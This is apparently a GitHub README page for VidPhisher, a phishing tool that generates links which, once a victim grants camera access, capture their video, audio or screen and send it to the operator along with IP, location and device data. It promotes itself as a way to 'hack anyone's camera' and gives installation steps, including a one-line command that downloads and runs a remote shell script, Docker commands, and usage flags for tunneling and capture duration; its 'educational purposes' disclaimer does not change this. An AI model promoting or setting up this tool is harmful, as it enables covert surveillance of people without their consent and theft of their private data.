KasRoudra / VidPhisher

VidPhisher is a camera phishing tool that allows you to capture video/audio of a device just by links. The author is not responsible for any misuse of it

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

VidPhisher

Hack anyone's camera and get videos

Hack anyone's camera and get videos!


[+] Description

VidPhisher is a phishing tool. It will generate a link. If anyone opens the link and permits camera access, his/her video will be captured and sent to you!

[*]Announcement

This project is now a part of MaxPhisher. Further bug fixes and feature addition will be available in that

[+] Installation

  • git clone https://github.com/KasRoudra/VidPhisher
  • cd VidPhisher

For termux, use additional command termux-setup-storage

  • bash vp.sh
Or Run Directly
wget https://raw.githubusercontent.com/KasRoudra/VidPhisher/main/vp.sh && bash vp.sh

Docker

  • sudo docker pull kasroudra/vidphisher
  • sudo docker run --rm -it --name vidphisher kasroudra/vidphisher
  • sudo docker cp vidphisher:/VidPhisher vidfiles [Run this on another terminal to copy received video/audio from docker to vidfiles folder keeping container open]
Usage
Usage: bash vp.sh [-h] [-o OPTION] [-p PORT] [-t TYPE] [-s DURATION] [-d DIRECTORY] [-u] [-nu]

Options:
  -h, --help                           Show this help message and exit
  -o OPTION, --option OPTION           Index of the template
  -p PORT, --port PORT                 Port of VidPhisher's Server (Default: 8080)
  -t TYPE, --type TYPE                 Type of media (video or audio or screen, Default: video)
  -T TUNNELER, --tunneler TUNNELER     Name of the tunneler for url shortening (Default: cloudflared)
  -d DIRECTORY, --directory DIRECTORY  Directory where images will be saved
  -s DURATION, --duration DURATION     Duration of media (Default: 5000(ms))
  --update(-u), --no-update (-nu)      Check for update (Default: true)

[+] Features

  • Two Templates
  • Get IP, Location, Device type and Browser
  • Concurrent double tunneling (Cloudflared and Loclx)
  • Choose where to save videos(custom directory)
  • Error Diagnoser
  • Argument support for templates, type, port, duration and directory

[+] Preview

Hack anyone's camera and get videos

[+] Depenencies

  • php
  • curl
  • wget
  • unzip

All of the necessary dependencies will be installed automatically in first run!

[+] Note

Edge do not support video capturing. Only audio can be captured from it. Only Firefox supports screen capturing additionally. And most of the rests support video and audio. If browser doesn't block VidPhisher and the victim allows access only then you can capture video/audio

[+] Credits

Thanks to Techchip and Muaz Khan for their open source codes!

[+] Disclaimer

This tool is developed for educational purposes. Here it demonstrates how camera phishing works. If anybody wants to gain unauthorized access to someones camera, he/she may try out this at his/her own risk. You have your own responsibilities and you are liable to any damage or violation of laws by this tool. The author is not responsible for any misuse of VidPhisher!

[~] Find Me on :

  • Github

  • Gmail

  • Facebook

  • Messenger

About

VidPhisher is a camera phishing tool that allows you to capture video/audio of a device just by links. The author is not responsible for any misuse of it

License:GNU General Public License v3.0


Languages

Language:Shell 58.3%Language:PHP 19.0%Language:HTML 12.6%Language:CSS 6.4%Language:JavaScript 2.0%Language:Dockerfile 1.7%